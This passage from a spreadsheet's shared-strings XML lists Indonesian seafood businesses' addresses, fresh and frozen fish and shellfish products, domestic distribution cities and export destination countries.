    <t>Ikan Pelagis Beku (Tongkol, Kembung, Salem, Banjar, Tenggiri, Cunang)</t>
  </si>
  <si>
    <t>Jl. Tanjung Tembaga Barat Pelabuhan Mayangan, Kel. Mayangan, Kec. Mayangan, Kota Probolinggo&lt;br&gt;Jawa Timur</t>
  </si>
  <si>
    <t>Ikan Pelagis Beku (Tongkol, Kembung, Lemadang, Layang, Tenggiri)</t>
  </si>
  <si>
    <t>Jl. Ir. Sutami (Tol Lama) No.22, Kel. Parang Loe, Kec. Tamalanrea, Kota Makassar&lt;br&gt;Sulawesi Selatan</t>
  </si>
  <si>
    <t>Kawasan Industri Millenium Jl. Millenium 22 Blok R5 No.3 Room C1, Kel. Kaduagung, Kec. Tigaraksa, Kabupaten Tangerang&lt;br&gt;Banten</t>
  </si>
  <si>
    <t>Kota Jakarta Selatan, Kota Jakarta Timur, Kota Jakarta Pusat, Kota Jakarta Barat, Kota Jakarta Utara, Kota Bekasi, Kota Depok, Kota Surabaya, Kota Tangerang</t>
  </si>
  <si>
    <t>Mussel Segar, Scallop Segar, Tiram Segar</t>
  </si>
  <si>
    <t>Kota Jakarta Selatan, Kota Jakarta Timur, Kota Jakarta Pusat, Kota Jakarta Barat, Kota Jakarta Utara, Kota Bekasi, Kota Surabaya, Kota Tangerang, Kota Tangerang Selatan</t>
  </si>
  <si>
    <t>Mussel Beku, Scallop Beku, Tiram Beku</t>
  </si>
  <si>
    <t>Kawasan Industri Jatake, Jl. Industri Raya II Blok J No.5 , Kel. Pasir Jaya, Kec. Jatiuwung, Kota Tangerang&lt;br&gt;Banten</t>
  </si>
  <si>
    <t>Ikan Pelagis Beku (Teri, Lemuru, Barakuda, Terbang, Salem, Kuwe, Kembung, Selar, Layang, Tenggiri, Baronang)</t>
  </si>
  <si>
    <t>Jl. Pulau Pinang 2, Kawasan Industri Medan II, Kel. Saentis, Kec. Percut Sei Tuan, Kabupaten Deli Serdang&lt;br&gt;Sumatera Utara</t>
  </si>
  <si>
    <t>Kepiting Lunak Beku</t>
  </si>
  <si>
    <t>Daging Kepiting Isi Beku</t>
  </si>
  <si>
    <t>Jl. Kavling DPR No.181 RT 003 RW 004, Kel. Serua, Kec. Bojongsari, Kota Depok&lt;br&gt;Jawa Barat</t>
  </si>
  <si>
    <t>Kota Depok</t>
  </si>
  <si>
    <t>Ikan Demersal Segar (Kod)</t>
  </si>
  <si>
    <t>Ikan Demersal Beku (Kod)</t>
  </si>
  <si>
    <t>Ikan Pelagis Segar (Halibut, Makerel, Pollock, Sarden)</t>
  </si>
  <si>
    <t>Ikan Pelagis Beku (Kod, Halibut, Makerel, Pollock, Sarden)</t>
  </si>
  <si>
    <t>Komplek Pergudangan Kosambi Permai Blok G No.15, Jl. Raya Perancis Dadap, Kel. Jatimulya, Kec. Kosambi, Kabupaten Tangerang&lt;br&gt;Banten</t>
  </si>
  <si>
    <t>Ikan Pelagis Beku (Tongkol, Layang, Cakalang, Salem)</t>
  </si>
  <si>
    <t>Komplek Pelabuhan Perikanan Samudera Lampulo, Jl. Sisingamangaraja Ujung, Kel. Lampulo, Kec. Kuta Alam, Kota Banda Aceh&lt;br&gt;Aceh</t>
  </si>
  <si>
    <t>Ikan Pelagis Beku (Lemuru, Tongkol, Kembung, Layang, Cakalang, Tetengkek, Selar Kuning)</t>
  </si>
  <si>
    <t>Tongkol Giling Beku</t>
  </si>
  <si>
    <t>Komplek Pergudangan Greenland Cluster Batavia Blok AG No.11 Kota Deltamas, Kel. Sukamahi, Kec. Cikarang Pusat, Kabupaten Bekasi&lt;br&gt;Jawa Barat</t>
  </si>
  <si>
    <t>Australia, United States</t>
  </si>
  <si>
    <t>Ikan Pelagis Beku (Baby Tuna, Lemuru, Barakuda, Lemadang, Cakalang, Tenggiri)</t>
  </si>
  <si>
    <t>Australia, Belgium, Japan, United States</t>
  </si>
  <si>
    <t>Ikan Demesal Beku (Kakap Putih, Gulama, Lencam, Manyung, Biji Nangka, Kerapu, Layur, Kakatua, Bawal, Kakap, Kaci-kaci, Kurisi, Ekor Kuning)</t>
  </si>
  <si>
    <t>Lrg. Rimba Sakti RT 20, Desa Pudak, Kec. Kumpeh Ulu, Kabupaten Muaro Jambi&lt;br&gt;Jambi</t>
  </si>
  <si>
    <t>Kerupuk Tulang Patin</t>
  </si>
  <si>
    <t>Kota Jambi</t>
  </si>
  <si>
    <t>Abon Patin</t>
  </si>
  <si>
    <t>Ruko Klampis Square C-28, Kel. Klampis Ngasem, Kec. Sukolilo, Kota Surabaya&lt;br&gt;Jawa Timur</t>
  </si>
  <si>
    <t>Ikan Pelagis Beku (Kembung, Salem, Layang, Tenggiri)</t>
  </si>
  <si>
    <t>Ikan Hasil Budidaya Beku (Lele, Bandeng, Patin, Nila, Gurame)</t>
  </si>
  <si>
    <t>Jl. Ikan Tuna Barat Raya II, Pelabuhan Benoa, Kel. Pedungan, Kec. Denpasar Selatan, Kota Denpasar&lt;br&gt;Bali</t>
  </si>
  <si>
    <t>Ikan Pelagis Beku (Tenggiri, Kembung, Layang)</t>
  </si>
  <si>
    <t>Ikan Demersal Beku (Manyung, Kerapu, Bawal, Kakap)</t>
  </si>
  <si>
    <t>Kota Surakarta</t>
  </si>
  <si>
    <t>Kawasan Pelabuhan Perikanan Samudra Nizam Zachman, Jl. Hiu Raya Blok D Kav No.4, Kel. Penjaringan, Kec. Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta</t>
  </si>
  <si>
    <t>Ikan Pelagis Beku (Barakuda, Tongkol, Lemadang, Layaran, Layang, Cakalang)</t>
  </si>
  <si>
    <t>Ikan Demersal Beku (Lencam, Biji Nangka, Kerapu, Layur, Kakatua, Kakap, Kaci-kaci)</t>
  </si>
  <si>
    <t>Pergudangan Bandara Mas Blok M No.20, Kel. Selapajang Jaya, Kec. Neglasari, Kota Tangerang&lt;br&gt;Banten</t>
  </si>
  <si>
    <t>Ikan Pelagis Beku (Teri, Lemuru, Tongkol, Kembung, Marlin, Layaran, Selar, Layang, Tenggiri, Selar Kuning)</t>
  </si>
  <si>
    <t>China, Malaysia, Singapore, Taiwan, Province of China, Viet Nam</t>
  </si>
  <si>
    <t>Ikan Demersal Beku (Amberjack, Malong, Lencam, Kuwe, Kuniran, Kerapu, Layur, Bawal, Kakap, Kaci-kaci, Kuro, Barramundi)</t>
  </si>
  <si>
    <t>Udang Ronggeng Beku</t>
  </si>
  <si>
    <t>Jl. Nambangan No.9 RT 006 RW 001, Kel. Tanah Kali Kedinding, Kec. Kenjeran, Kota Surabaya&lt;br&gt;Jawa Timur</t>
  </si>
  <si>
    <t>Ikan Pelagis Segar (Teri, Lemuru, Tongkol, Cobia, Escolar, Kembung, Lemadang, Marlin, Layaran, Sarden, Cakalang, Tenggiri, Pedang)</t>
  </si>
  <si>
    <t>Japan, Singapore</t>
  </si>
  <si>
    <t>Ikan Pelagis Beku (Teri, Lemuru, Tongkol, Cobia, Kembung, Lemadang, Marlin, Sarden, Selar, Cakalang, Tenggiri)</t>
  </si>
  <si>
    <t>Ikan Demersal Segar (Barramundi, Malong, Lencam, Biji Nangka, Kuniran, Kerapu, Layur, Kakatua, Bawal, Kakap, Kaci-kaci, Kuro, Kurisi)</t>
  </si>
  <si>
    <t>Ikan Demersal Beku (Barramundi, Malong, Lencam, Biji Nangka, Kuniran, Kerapu, Layur, Kakatua, Bawal, Kakap, Kaci-kaci, Kuro, Kurisi)</t>
  </si>
  <si>
    <t>Ikan Demersal Segar (Mata Besar, Manyung, Kerapu, Kakap, Kurisi)</t>
  </si>
  <si>
    <t>Ikan Pelagis Segar (Tongkol, Kembung, Tenggiri, Selar Kuning)</t>
  </si>
  <si>
    <t>Jl. Dermaga Baru No.7, Kel. Pluit, Kec. Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta</t>
  </si>
  <si>
    <t>Ikan Demersal Segar (Bawal, Samge, Kakap, Kuro)</t>
  </si>
  <si>
    <t>Ikan Demersal Beku (Bawal, Kakap, Samge, Kuro)</t>
  </si>
  <si>
    <t>Ikan Pelagis Segar (Tongkol, Kembung, Cakalang, Tenggiri)</t>
  </si>
  <si>
    <t>Ikan Pelagis Beku (Tongkol, Kembung, Salem, Cakalang, Tenggiri)</t>
  </si>
  <si>
    <t>Gudang Alat Perikanan Blok D No.3 Jl. Dermaga Muara Angke, Kel. Pluit, Kec. Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta</t>
  </si>
  <si>
    <t>Cephalopoda Kering (Cumi-cumi)</t>
  </si>
  <si>
    <t>Jl. Muara Baru Ujung, Pelabuhan Muara Baru Blok K.7C, Kel. Penjaringan, Kec. Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta</t>
  </si>
  <si>
    <t>Ikan Pelagis Beku Untuk Umpan (Sarden, Salem)</t>
  </si>
  <si>
    <t>Tulang Sotong Kering</t>
  </si>
  <si>
    <t>Jl. Raya Tulehu, Dusun Mamokeng, Kel. Tulehu, Kec. Salahutu, Kabupaten Maluku Tengah&lt;br&gt;Maluku</t>
  </si>
  <si>
    <t>Ikan Pelagis Segar (Meka)</t>
  </si>
  <si>
    <t>Jl. Selar Gang Jambu No.12, Kel. Ketapang, Kec. Pangkalbalam, Kota Pangkal Pinang&lt;br&gt;Kepulauan Bangka Belitung</t>
  </si>
  <si>
    <t>Jl. Gatot Subroto V No.6, Kel. Kaluku Bodoa, Kec. Tallo, Kota Makassar&lt;br&gt;Sulawesi Selatan</t>
  </si>
  <si>
    <t>Jl. Pasar Ikan Beba, Kel. Tamasaju, Kec. Galesong Utara, Kabupaten Takalar&lt;br&gt;Sulawesi Selatan</t>
  </si>
  <si>
    <t>Ikan Air Tawar Beku (Lele, Gurami, Mujair, Patin, Gabus, Nila)</t>
  </si>
  <si>
    <t>Australia, Japan, United States</t>
  </si>
  <si>
    <t>Kp. Kojan RT 007 RW 006, Kel. Kalideres, Kec. Kalideres, Kota Jakarta Barat&lt;br&gt;DKI Jakarta</t>
  </si>
  <si>
    <t>Ikan Air Tawar Segar (Lele, Gurami, Mujair, Patin, Gabus, Nila)</t>
  </si>
  <si>
    <t>Pergudangan Kosambi Megah Jl. Raya Perancis Blok A14, Kel. Kosambi Timur, Kec. Kosambi, Kabupaten Tangerang&lt;br&gt;Banten</t>
  </si>
  <si>
    <t>Kota Jakarta Utara, Kota Semarang, Kota Surabaya</t>
  </si>
  <si>
    <t>China, Hong Kong, Japan, Korea, Democratic People's Republic of, Malaysia, Philippines, Singapore, Taiwan, Province of China, Viet Nam</t>
  </si>
  <si>
    <t xml:space="preserve">Sirip Pari Kering, Kulit Pari Kering, Tulang Pari Kering </t>
  </si>
  <si>
    <t>Kota Jakarta Utara, Kabupaten Indramayu, Kabupaten Cilacap, Kabupaten Tegal, Kota Surabaya</t>
  </si>
  <si>
    <t>Australia, China, Hong Kong, Japan, Korea, Democratic People's Republic of, Malaysia, Philippines, Singapore, Taiwan, Province of China, Viet Nam</t>
  </si>
  <si>
    <t>Kota Jakarta Utara, Kota Bandung, Kota Surabaya</t>
  </si>
  <si>
    <t>Jl. Bakti Mulya 2 No.58, Kel. Tegal Alur, Kec. Kalideres, Kota Jakarta Barat&lt;br&gt;DKI Jakarta</t>
  </si>
  <si>
    <t>Ikan Hasil Budidaya Segar (Nila, Patin, Lele, Gurame)</t>
  </si>
  <si>
    <t>Ikan Hasil Budidaya Beku (Nila, Patin, Lele, Gurame)</t>
  </si>
  <si>
    <t xml:space="preserve">Produk Perikanan Bernilai Tambah Beku (Bakso Ikan) </t>
  </si>
  <si>
    <t>Teripang Beku</t>
  </si>
  <si>
    <t>Jl. Johar Blok F8/7 Delta Silicon 3 Lippo Cikarang, Kel. Cicau, Kec. Cikarang Pusat, Kabupaten Bekasi&lt;br&gt;Jawa Barat</t>
  </si>
  <si>
    <t>Dusun Krajan RT 005 RW 004, Kel. Kedungrejo, Kec. Muncar, Kabupaten Banyuwangi&lt;br&gt;Jawa Timur</t>
  </si>
  <si>
    <t>Keong Beku</t>
  </si>
  <si>
    <t>Jl. Laksamana Malahayati, Kel. Temberan, Kec. Bukit Intan, Kota Pangkal Pinang&lt;br&gt;Kepulauan Bangka Belitung</t>
  </si>
  <si>
    <t>Ikan Demersal Segar (Kerapu)</t>
  </si>
  <si>
    <t>Kota Pangkal Pinang</t>
  </si>
  <si>
    <t>Jl. Efraim Lengkong, Kel. Manembo-nembo, Kec. Matuari, Kota Bitung&lt;br&gt;Sulawesi Utara</t>
  </si>
  <si>
    <t>Kota Denpasar, Kota Bitung</t>
  </si>
  <si>
    <t>Steak Tuna Beku</t>
  </si>
  <si>
    <t>Jl. Lingkar Timur Pergudangan Sinar Buduran III Blok C-03, Kel. Siwalan Panji, Kec. Buduran, Kabupaten Sidoarjo&lt;br&gt;Jawa Timur</t>
  </si>
  <si>
    <t>Ikan Demersal Beku (Barramundi, Mata Besar, Bawal, Kerapu, Layur, Kakatua, Kakap, Kurisi, Ekor Kuning)</t>
  </si>
  <si>
    <t>Kabupaten Sidoarjo, Kabupaten Lamongan, Kabupaten Sampang, Kabupaten Pamekasan, Kabupaten Sumenep, Kota Surabaya, Kabupaten Sorong</t>
  </si>
  <si>
    <t>China, Taiwan, Province of China, Thailand, United States, Viet Nam</t>
  </si>
  <si>
    <t>Ikan Pelagis Beku (Lemuru, Tongkol, Deho, Kuwe, Marlin, Talang-talang, Selar, Layang, Tenggiri)</t>
  </si>
  <si>
    <t>Kota Jakarta Utara, Kota Tegal, Kabupaten Sidoarjo, Kabupaten Lamongan, Kabupaten Sampang, Kabupaten Pamekasan, Kabupaten Sumenep, Kota Surabaya, Kabupaten Sorong</t>
  </si>
  <si>
    <t>Belgium, China, Taiwan, Province of China, Thailand, United States, Viet Nam</t>
  </si>
  <si>
    <t>Kota Jakarta Utara, Kabupaten Pati, Kabupaten Semarang, Kota Tegal, Kabupaten Sidoarjo, Kabupaten Tuban, Kabupaten Lamongan, Kota Surabaya, Kota Manado, Kota Palu, Kabupaten Sorong</t>
  </si>
  <si>
    <t>Dusun Janten RT 06, Kel. Ngestiharjo, Kec. Kasihan, Kabupaten Bantul&lt;br&gt;Daerah Istimewa Yogyakarta</t>
  </si>
  <si>
    <t>Kabupaten Klaten, Kota Semarang, Kabupaten Kulon Progo, Kabupaten Bantul, Kabupaten Gunung Kidul, Kabupaten Sleman, Kota Yogyakarta</t>
  </si>
  <si>
    <t>Crispy Ikan</t>
  </si>
  <si>
    <t>Kabupaten Kulon Progo, Kabupaten Bantul, Kabupaten Gunung Kidul, Kabupaten Sleman, Kota Yogyakarta</t>
  </si>
  <si>
    <t>Kota Jakarta Utara, Kabupaten Trenggalek, Kabupaten Tulungagung, Kabupaten Sidoarjo, Kabupaten Tuban, Kabupaten Lamongan, Kabupaten Gresik, Kabupaten Sampang, Kabupaten Pamekasan, Kabupaten Sumenep, Kota Surabaya, Kabupaten Maluku Tenggara, Kota Sorong, Kabupaten Merauke</t>
  </si>
  <si>
    <t>Kota Jakarta Utara, Kabupaten Trenggalek, Kabupaten Tulungagung, Kabupaten Sidoarjo, Kabupaten Tuban, Kabupaten Lamongan, Kabupaten Gresik, Kabupaten Sampang, Kabupaten Pamekasan, Kabupaten Sumenep, Kota Surabaya, Kabupaten Maluku Tenggara, Kabupaten Sorong, Kabupaten Merauke</t>
  </si>
  <si>
    <t>Kabupaten Lampung Selatan</t>
  </si>
  <si>
    <t>Kota Jakarta Utara, Kota Denpasar, Kota Bima, Kota Bitung, Kabupaten Maluku Tenggara, Kabupaten Fakfak, Kabupaten Sorong</t>
  </si>
  <si>
    <t>Belgium, China, Japan, Taiwan, Province of China, Thailand, United States, Viet Nam</t>
  </si>
  <si>
    <t>Dusun Daksan, Kel. Aengsareh, Kec. Sampang, Kabupaten Sampang&lt;br&gt;Jawa Timur</t>
  </si>
  <si>
    <t>Ikan Demersal Beku (Swanggi, Gulama, Lencam, Sebelah, Manyung, Biji Nangka, Kerapu, Beloso, Bawal, Merah, Kakap, Kurisi, Ekor Kuning, Barramundi)</t>
  </si>
  <si>
    <t>Jl. Pelita Cipatuguran RT 04 RW 20, Kel. Palabuhanratu, Kec. Palabuhanratu, Kabupaten Sukabumi&lt;br&gt;Jawa Barat</t>
  </si>
  <si>
    <t>Ikan Demersal Beku (Mata Goyang, Layur, Samge)</t>
  </si>
  <si>
    <t>China, Japan, Taiwan, Province of China, Viet Nam</t>
  </si>
  <si>
    <t>Jl. Margomulyo No.44 Komplek Suri Mulia Blok H-17, Kel. Asemrowo, Kec. Tambak Sari Oso, Kota Surabaya&lt;br&gt;Jawa Timur</t>
  </si>
  <si>
    <t>Ikan Pelagis Beku (Tongkol, Gabus Laut, Tembang, Marlin, Layaran, Layang, Cakalang, Tenggiri)</t>
  </si>
  <si>
    <t>Kota Jakarta Timur, Kabupaten Pasuruan, Kabupaten Gresik, Kota Surabaya, Kota Makassar</t>
  </si>
  <si>
    <t>Ikan Air Tawar Beku (Bandeng, Nila)</t>
  </si>
  <si>
    <t>Kota Jakarta Timur, Kabupaten Probolinggo, Kota Surabaya</t>
  </si>
  <si>
    <t>Ikan Demersal Beku (Swanggi, Gulama, Lencam, Sebelah, Manyung, Biji Nangka, Kerapu, Gerot-gerot, Beloso, Bawal, Merah, Kakap, Kurisi, Ekor Kuning)</t>
  </si>
  <si>
    <t>Kota Jakarta Timur, Kabupaten Probolinggo, Kabupaten Pasuruan, Kabupaten Sidoarjo, Kota Surabaya, Kota Makassar</t>
  </si>
  <si>
    <t>Kota Jakarta Timur, Kabupaten Lamongan, Kabupaten Gresik, Kota Surabaya, Kota Makassar</t>
  </si>
  <si>
    <t>Jl. Kidemang Singomenggolo Kav 4, Kel. Sidomulyo, Kec. Buduran, Kabupaten Sidoarjo&lt;br&gt;Jawa Timur</t>
  </si>
  <si>
    <t>Ikan Demersal Beku (Swanggi, Gulama, Lencam, Sebelah, Manyung, Kerapu, Layur, Bawal, Kakap, Kurisi, Ekor Kuning)</t>
  </si>
  <si>
    <t>Ikan Air Tawar Beku (Lele, Bandeng, Patin, Nila)</t>
  </si>
  <si>
    <t>China, Japan, Viet Nam</t>
  </si>
  <si>
    <t>Komplek Pelabuhan Perikanan Nusantara Tanjung Pandan, Jl. RE. Martadinata RT 007 RW 004, Kel. Kota, Kec. Tanjung Pandan, Kabupaten Belitung&lt;br&gt;Kepulauan Bangka Belitung</t>
  </si>
  <si>
    <t>Ikan Demersal Beku (Ekor Kuning)</t>
  </si>
  <si>
    <t>Siput Beku</t>
  </si>
  <si>
    <t>Jl. Kima IV Kav P3A, Kel. Daya, Kec. Biringkanaya, Kota Makassar&lt;br&gt;Sulawesi Selatan</t>
  </si>
  <si>
    <t>Chile, China, Denmark, United States</t>
  </si>
  <si>
    <t>Jl. Raya Karangandong Legundi Business Park A7, Kel. Banjaran, Kec. Driyorejo, Kabupaten Gresik&lt;br&gt;Jawa Timur</t>
  </si>
  <si>
    <t>China, Japan, Spain, Viet Nam</t>
  </si>
  <si>
    <t>Jl. Sultan Hasanuddin, Kompleks PPN Tantui Ambon, Kel. Pandan Kasturi, Kec. Sirimau, Kota Ambon&lt;br&gt;Maluku</t>
  </si>
  <si>
    <t>Ikan Demersal Beku (Kakap Putih, Lencam, Kerapu, Layur, Kakatua, Kakap Merah, Merah, Kurisi)</t>
  </si>
  <si>
    <t>Kota Jakarta Utara, Kota Denpasar</t>
  </si>
  <si>
    <t>Cephalopoda Beku (Gurita)</t>
  </si>
  <si>
    <t>Ikan Pelagis Beku (Baby Tuna, Lemuru, Tongkol, Julung-julung, Kembung, Marlin, Layaran, Layang, Perak-perak, Cakalang, Pedang)</t>
  </si>
  <si>
    <t>Kota Jakarta Utara, Kota Denpasar, Kota Ambon</t>
  </si>
  <si>
    <t>Jl. Ir. Sutami Km 7, Kel. Kota Baru, Kec. Tanjung Karang Timur, Kota Bandar Lampung&lt;br&gt;Lampung</t>
  </si>
  <si>
    <t>Campuran Seafood Pasteurisasi Dingin</t>
  </si>
  <si>
    <t>Canada, United States</t>
  </si>
  <si>
    <t>Jl. Kawasan Industri Perikanan Poumako, Kel. Poumako, Kec. Mimika, Kabupaten Mimika&lt;br&gt;Papua</t>
  </si>
  <si>
    <t>Ikan Pelagis Beku (Baby Tuna, Deho, Layang, Cakalang, Tenggiri)</t>
  </si>
  <si>
    <t>Kota Jakarta Utara, Kota Surabaya, Kabupaten Mimika</t>
  </si>
  <si>
    <t>China, Korea, Republic of, Viet Nam</t>
  </si>
  <si>
    <t>Ikan Demersal Beku (Kakap, Kerapu, Layur, Kakatua)</t>
  </si>
  <si>
    <t>China, Korea, Republic of, Singapore, Viet Nam</t>
  </si>
  <si>
    <t>China, Singapore, United States, Viet Nam</t>
  </si>
  <si>
    <t>China, Singapore, Viet Nam</t>
  </si>
  <si>
    <t>China, Korea, Republic of, Singapore, United States</t>
  </si>
  <si>
    <t>Jl. Muara Baru Ujung Blok Heritage Mercusuar Kav 3 Room 3, Kel. Penjaringan, Kec. Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta</t>
  </si>
  <si>
    <t>Jl. Muara Baru Ujung Blok N1, Kel. Penjaringan, Kec. Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta</t>
  </si>
  <si>
    <t>Ikan Pelagis Beku (Panni, Tongkol, Kembung, Kawabida, Malalugis, Layang, Cakalang, Salem)</t>
  </si>
  <si>
    <t>Pergudangan Safe N Lock Blok K 1718 Jl Lingkar Timur Km 5.5, Kel. Rangkah Kidul, Kec. Sidoarjo, Kabupaten Sidoarjo&lt;br&gt;Jawa Timur</t>
  </si>
  <si>
    <t>Ikan Pelagis Beku (Baby Tuna, Tongkol, Deho, Kembung, Makerel, Sarden, Banjar, Layang, Cakalang, Tenggiri)</t>
  </si>
  <si>
    <t>Kota Jakarta Selatan, Kota Jakarta Timur, Kota Jakarta Barat, Kota Jakarta Utara, Kabupaten Malang, Kabupaten Probolinggo, Kabupaten Pasuruan, Kabupaten Sidoarjo, Kabupaten Mojokerto, Kabupaten Lamongan, Kabupaten Gresik, Kota Surabaya</t>
  </si>
  <si>
    <t>Ikan Demersal Beku (Barramundi, Gulama, Lencam, Sebelah, Manyung, Kuwe, Kerapu, Layur, Kakatua, Bawal, Kakap, Kurisi, Ekor Kuning)</t>
  </si>
  <si>
    <t>Kota Jakarta Selatan, Kota Jakarta Timur, Kota Jakarta Pusat, Kota Jakarta Barat, Kota Jakarta Utara, Kabupaten Malang, Kabupaten Probolinggo, Kabupaten Pasuruan, Kabupaten Sidoarjo, Kabupaten Mojokerto, Kabupaten Lamongan, Kota Surabaya</t>
  </si>
  <si>
    <t>Kota Jakarta Selatan, Kota Jakarta Timur, Kota Jakarta Pusat, Kota Jakarta Barat, Kota Jakarta Utara, Kabupaten Malang, Kabupaten Probolinggo, Kabupaten Pasuruan, Kabupaten Sidoarjo, Kabupaten Mojokerto, Kabupaten Lamongan, Kabupaten Gresik, Kota Surabaya</t>
  </si>
  <si>
    <t>Jl. Millenium Raya Blok L1 No.1 Kawasan Industri Millenium, Kel. Peusar, Kec. Panongan, Kabupaten Tangerang&lt;br&gt;Banten</t>
  </si>
  <si>
    <t>Salmon Beku</t>
  </si>
  <si>
    <t>Kota Medan, Kota Jakarta Barat, Kota Jakarta Utara</t>
  </si>
  <si>
    <t>Jl. Kima 8 Kav SS No.23A Kawasan Industri Makassar, Kel. Bira, Kec. Tamalanrea, Kota Makassar&lt;br&gt;Sulawesi Selatan</t>
  </si>
  <si>
    <t>Kepiting Segar</t>
  </si>
  <si>
    <t>Bandeng Tanpa Duri</t>
  </si>
  <si>
    <t>Jl. Ir. Sutami No. 34B Pergudangan SPPBE Blok F3, Kel. Parangloe, Kec. Tamalanrea, Kota Makassar&lt;br&gt;Sulawesi Selatan</t>
  </si>
  <si>
    <t>Chile, China, Japan, Philippines, Tunisia, Viet Nam</t>
  </si>
  <si>
    <t>Jl. Kosambi Perancis Permai Blok L No.15, 15A, 16, Kel. Dadap, Kec. Kosambi, Kabupaten Tangerang&lt;br&gt;Banten</t>
  </si>
  <si>
    <t>Kabupaten Bangka</t>
  </si>
  <si>
    <t>China, Thailand, Viet Nam</t>
  </si>
  <si>
    <t>Ikan Pelagis Beku (Tongkol, Kembung, Marlin, Gindara, Cakalang, Tenggiri, Salem)</t>
  </si>
  <si>
    <t>Ikan Demersal Beku (Bawal, Lencam, Kerapu, Layur, Kakap, Ayam-ayam)</t>
  </si>
  <si>
    <t>Komplek Pergudangan Kosambi Permai Blok KK16 - KK17, Kel. Jatimulya, Kec. Kosambi, Kabupaten Tangerang&lt;br&gt;Banten</t>
  </si>
  <si>
    <t>Cephalopoda Beku (Sotong, Gurita, Cumi-cumi, Salem)</t>
  </si>
  <si>
    <t>Ikan Pelagis Beku (Tongkol, Kembung, Lemadang, Marlin, Gindara, Layang, Cakalang, Tenggiri, Salem)</t>
  </si>
  <si>
    <t>Ikan Demesal Beku (Bawal, Lencam, Kerapu, Layur, Ayam-Ayam, Ekor Kuning)</t>
  </si>
  <si>
    <t>Scallop Beku</t>
  </si>
  <si>
    <t>Jl. TPI Prapag Kidul RT 05 RW 04, Kel. Prapag Kidul, Kec. Losari, Kabupaten Brebes&lt;br&gt;Jawa Tengah</t>
  </si>
  <si>
    <t>Desa Gajah RT 002 RW 003, Kec. Gajah, Kabupaten Demak&lt;br&gt;Jawa Tengah</t>
  </si>
  <si>
    <t>Ikan Demersal Beku (Cod, Halibut, Seabass)</t>
  </si>
  <si>
    <t>Kota Medan, Kota Jakarta Selatan, Kota Jakarta Utara</t>
  </si>
  <si>
    <t>Jl. Nambangan 09, Kel. Kenjeran, Kec. Tanah Kali Kedinding, Kota Surabaya&lt;br&gt;Jawa Timur</t>
  </si>
  <si>
    <t xml:space="preserve">Produk Perikanan Bernilai Tambah Beku (Bakso Ikan, Kue Ikan, Pangsit Ikan) </t>
  </si>
  <si>
    <t>Kota Bandar Lampung, Kota Jakarta Timur, Kota Jakarta Pusat, Kota Jakarta Barat, Kota Jakarta Utara, Kabupaten Bogor, Kabupaten Bandung, Kabupaten Cilacap, Kabupaten Purbalingga, Kabupaten Kebumen, Kabupaten Purworejo, Kabupaten Klaten, Kabupaten Semarang, Kabupaten Tegal, Kota Yogyakarta, Kabupaten Malang, Kabupaten Banyuwangi, Kabupaten Probolinggo, Kabupaten Sidoarjo, Kabupaten Mojokerto, Kabupaten Jombang, Kabupaten Nganjuk, Kabupaten Madiun, Kabupaten Ngawi, Kota Surabaya, Kota Denpasar, Kabupaten Lombok Tengah, Kota Banjarmasin, Kota Balikpapan, Kota Makassar, Kota Ternate</t>
  </si>
  <si>
    <t>Indonesia</t>
  </si>
  <si>
    <t>Jl. Pulau Sulawesi Kawasan Industri Medan 1, Kel. Mabar, Kec. Medan Deli, Kota Medan&lt;br&gt;Sumatera Utara</t>
  </si>
  <si>
    <t>Roll Ikan</t>
  </si>
  <si>
    <t>Kota Jakarta Barat</t>
  </si>
  <si>
    <t>Komplek Pergudangan dan Industri Safe N Lock Blok AG No.5722, Jl. Lingkar Timur Km 5.5, Kel. Pucanganom, Kec. Sidoarjo, Kabupaten Sidoarjo&lt;br&gt;Jawa Timur</t>
  </si>
  <si>
    <t>Hong Kong, Malaysia, Singapore, Thailand</t>
  </si>
  <si>
    <t>Sirip Pari Kering, Kulit Pari Kering, Tulang Pari Kering</t>
  </si>
  <si>
    <t>Jl. Raya Deli Tua - Patumbak Km 18.5, Jl. Lantasan Baru No.1, Kel. Cinta Damai, Kec. Patumbak, Kabupaten Deli Serdang&lt;br&gt;Sumatera Utara</t>
  </si>
  <si>
    <t>Hong Kong, Malaysia, Singapore, Taiwan, Province of China, Thailand</t>
  </si>
  <si>
    <t>UD. ANUGERAH BINTANG CEMERLANG</t>
  </si>
  <si>
    <t>Jl. Bambu Runcing No.99, Kel. Bonto Talassa, Kec. Simbang, Kabupaten Maros&lt;br&gt;Sulawesi Selatan</t>
  </si>
  <si>
    <t>Namibia</t>
  </si>
  <si>
    <t>Kota Jakarta Utara, Kota Surabaya, Kota Ambon</t>
  </si>
  <si>
    <t>Sri Lanka, Taiwan, Province of China</t>
  </si>
  <si>
    <t>Jl. Raya Situbondo Km 12,5, Kel. Ketapang, Kec. Kalipuro, Kabupaten Banyuwangi&lt;br&gt;Jawa Timur</t>
  </si>
  <si>
    <t>Tuna Masak Beku</t>
  </si>
  <si>
    <t>Kota Bitung</t>
  </si>
  <si>
    <t>Algeria, Thailand</t>
  </si>
  <si>
    <t>Albania, Algeria, Angola, Belgium, Bosnia and Herzegovina, Croatia, Egypt, Iraq, Kuwait, Libya, Montenegro, Oman, Papua New Guinea, Qatar, Saudi Arabia, Serbia, Slovenia, Somalia, Syrian Arab Republic, Ukraine, United Arab Emirates, Yemen</t>
  </si>
  <si>
    <t>Jl. Pendidikan No.8, Kel. Bontolanra, Kec. Galesong Utara, Kabupaten Takalar&lt;br&gt;Sulawesi Selatan</t>
  </si>
  <si>
    <t>Jl. Kima 4 Kav K-9 Blok B2 Kawasan Industri Makassar, Kel. Daya, Kec. Biringkanaya, Kota Makassar&lt;br&gt;Sulawesi Selatan</t>
  </si>
  <si>
    <t>Kota Jakarta Barat, Kota Surabaya, Kota Manado</t>
  </si>
  <si>
    <t>Canada, Denmark, Japan, Netherlands, United States, Viet Nam</t>
  </si>
  <si>
    <t>Jl. Semarang - Demak Km 7, Kel. Banjardowo, Kec. Genuk, Kota Semarang&lt;br&gt;Jawa Tengah</t>
  </si>
  <si>
    <t>France</t>
  </si>
  <si>
    <t>Kota Palembang, Kota Batam, Kota Jakarta Pusat, Kota Bogor, Kota Semarang, Kota Surabaya, Kota Banjarmasin</t>
  </si>
  <si>
